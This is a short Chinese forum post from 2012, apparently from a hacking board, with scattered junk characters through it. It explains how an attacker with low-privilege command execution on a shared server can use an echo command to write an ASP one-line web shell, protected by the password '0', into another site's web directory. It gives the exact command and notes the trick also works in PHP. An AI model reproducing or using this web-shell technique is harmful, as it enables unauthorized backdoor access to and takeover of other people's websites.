在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
3 T4 k6 d7 r# S1 t: B) ?- Y2 y1 }# ~
* S' ]8 h) ~/ M命令格式
# y, }& c+ z: F) U* v, e
" m H" Q% [( R1 ?4 S5 qEcho 语句 >目标站绝对目录
. R6 a9 ?! A9 s: x. K! z
, P0 t7 J+ Z$ V: s3 g例如:
9 X9 I# _& @+ s `) f5 x2 f3 P0 q0 Z
echo ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
" W$ R$ V+ [) ]1 V
' t5 }( y. N* ~0 w/ |: E& V这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。
/ u- n: b! t/ y8 L# s0 p, Y |
发表于 2012-9-23 14:40:24
收藏
支持
反对